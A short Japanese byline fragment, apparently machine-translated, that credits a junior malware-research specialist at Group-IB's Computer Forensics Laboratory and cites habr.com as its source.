主演 セミョン・ロガチェワ, Group-IB Computer Forensics Laboratory のマルウェア研究のジュニア スペシャリスト。

出所： habr.com